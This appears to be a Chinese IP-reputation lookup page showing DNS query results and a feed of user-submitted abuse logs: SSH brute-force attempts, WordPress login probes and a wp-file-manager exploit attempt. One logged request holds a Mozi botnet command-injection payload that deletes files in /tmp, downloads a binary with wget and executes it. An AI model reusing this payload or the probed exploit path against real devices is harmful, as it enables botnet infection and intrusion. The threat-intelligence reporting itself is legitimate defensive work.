必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States of America (the)

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 132.113.125.4
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 60204
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;132.113.125.4.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2024120900 1800 900 604800 86400

;; Query time: 14 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Dec 10 00:19:03 CST 2024
;; MSG SIZE  rcvd: 106
HOST信息:
b'Host 4.125.113.132.in-addr.arpa not found: 2(SERVFAIL)
'
NSLOOKUP信息:
server can't find 132.113.125.4.in-addr.arpa: SERVFAIL
相关IP信息:
最新评论:
IP 类型 评论内容 时间
61.244.70.248 attackbotsspam
61.244.70.248 - - [11/Sep/2020:00:30:50 +0100] "POST /wp-login.php HTTP/1.1" 200 1874 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
61.244.70.248 - - [11/Sep/2020:00:30:52 +0100] "POST /wp-login.php HTTP/1.1" 200 1858 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
61.244.70.248 - - [11/Sep/2020:00:30:53 +0100] "POST /xmlrpc.php HTTP/1.1" 403 219 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...
2020-09-11 07:58:31
68.197.126.163 attack
Sep 10 18:50:24 h1946882 sshd[9114]: Failed password for r.r from 68.1=
97.126.163 port 46454 ssh2
Sep 10 18:50:25 h1946882 sshd[9114]: Connection closed by 68.197.126.16=
3 [preauth]
Sep 10 18:50:40 h1946882 sshd[9158]: Failed password for r.r from 68.1=
97.126.163 port 46965 ssh2
Sep 10 18:50:40 h1946882 sshd[9158]: Connection closed by 68.197.126.16=
3 [preauth]


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=68.197.126.163
2020-09-11 07:35:13
36.111.182.49 attackbotsspam
[N10.H2.VM2] Port Scanner Detected Blocked by UFW
2020-09-11 08:06:27
181.46.164.9 attack
(cxs) cxs mod_security triggered by 181.46.164.9 (AR/Argentina/cpe-181-46-164-9.telecentro-reversos.com.ar): 1 in the last 3600 secs (CF_ENABLE); Ports: *; Direction: inout; Trigger: LF_CXS; Logs: [Thu Sep 10 18:55:20.401814 2020] [:error] [pid 3943566:tid 47466712020736] [client 181.46.164.9:17461] [client 181.46.164.9] ModSecurity: Access denied with code 403 (phase 2). File "/tmp/20200910-185518-X1padp1cg7rkBOBCfBdcDgAAAA0-file-JRUfUL" rejected by the approver script "/etc/cxs/cxscgi.sh": 0 [file "/etc/apache2/conf.d/modsec_vendor_configs/configserver/00_configserver.conf"] [line "7"] [id "1010101"] [msg "ConfigServer Exploit Scanner (cxs) triggered"] [severity "CRITICAL"] [hostname "gastro-ptuj.si"] [uri "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"] [unique_id "X1padp1cg7rkBOBCfBdcDgAAAA0"], referer: http://gastro-ptuj.si/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
2020-09-11 07:48:40
84.17.59.41 attackbots
84.17.59.41 - - [10/Sep/2020:18:15:31 +0100] "POST //wp-login.php HTTP/1.1" 200 3626 "https://wpeagledemoblog.com//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
84.17.59.41 - - [10/Sep/2020:18:15:31 +0100] "POST //wp-login.php HTTP/1.1" 200 3626 "https://wpeagledemoblog.com//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
84.17.59.41 - - [10/Sep/2020:18:15:31 +0100] "POST //wp-login.php HTTP/1.1" 200 3626 "https://wpeagledemoblog.com//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
...
2020-09-11 07:59:40
92.39.42.75 attack
Sep 10 18:55:42 andromeda sshd\[5719\]: Invalid user admin from 92.39.42.75 port 37898
Sep 10 18:55:42 andromeda sshd\[5719\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=92.39.42.75
Sep 10 18:55:44 andromeda sshd\[5719\]: Failed password for invalid user admin from 92.39.42.75 port 37898 ssh2
2020-09-11 07:33:16
82.117.239.183 attackspam
Automatic report - Banned IP Access
2020-09-11 07:55:59
202.83.42.235 attack
C2,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
2020-09-11 08:08:56
121.241.244.92 attack
2020-09-10 17:27:58.086955-0500  localhost sshd[39578]: Failed password for root from 121.241.244.92 port 58572 ssh2
2020-09-11 08:07:16
115.79.138.163 attackbotsspam
Sep 10 22:04:32 instance-2 sshd[21991]: Failed password for root from 115.79.138.163 port 62639 ssh2
Sep 10 22:06:54 instance-2 sshd[22057]: Failed password for root from 115.79.138.163 port 63937 ssh2
2020-09-11 08:03:17
207.244.229.214 attackspam
recursive DNS query
2020-09-11 07:48:19
167.99.88.37 attackspambots
Sep 10 21:58:23 inter-technics sshd[13247]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.99.88.37  user=root
Sep 10 21:58:26 inter-technics sshd[13247]: Failed password for root from 167.99.88.37 port 58230 ssh2
Sep 10 22:02:08 inter-technics sshd[13541]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.99.88.37  user=root
Sep 10 22:02:10 inter-technics sshd[13541]: Failed password for root from 167.99.88.37 port 43788 ssh2
Sep 10 22:06:01 inter-technics sshd[13733]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.99.88.37  user=root
Sep 10 22:06:03 inter-technics sshd[13733]: Failed password for root from 167.99.88.37 port 57568 ssh2
...
2020-09-11 07:42:26
176.148.130.19 attackbotsspam
Sep 10 22:01:06 ssh2 sshd[18387]: User root from rqp06-h01-176-148-130-19.dsl.sta.abo.bbox.fr not allowed because not listed in AllowUsers
Sep 10 22:01:06 ssh2 sshd[18387]: Failed password for invalid user root from 176.148.130.19 port 47558 ssh2
Sep 10 22:01:07 ssh2 sshd[18387]: Connection closed by invalid user root 176.148.130.19 port 47558 [preauth]
...
2020-09-11 07:49:47
49.234.56.65 attackspambots
Sep 10 21:00:28 vpn01 sshd[12281]: Failed password for root from 49.234.56.65 port 51990 ssh2
...
2020-09-11 07:39:03
134.209.96.131 attackbots
Sep 10 16:03:02 vps46666688 sshd[30880]: Failed password for root from 134.209.96.131 port 53422 ssh2
Sep 10 16:06:59 vps46666688 sshd[31040]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.96.131
...
2020-09-11 07:38:48

最近上报的IP列表

48.233.104.185 168.173.212.33 133.15.241.47 144.172.184.63
206.39.240.36 115.5.144.172 101.103.249.118 101.85.123.107
196.198.52.141 32.166.146.228 139.193.137.210 242.27.81.172
21.253.145.243 115.4.74.231 234.111.173.5 125.90.1.55
227.20.145.127 195.19.76.225 54.118.239.160 116.36.85.177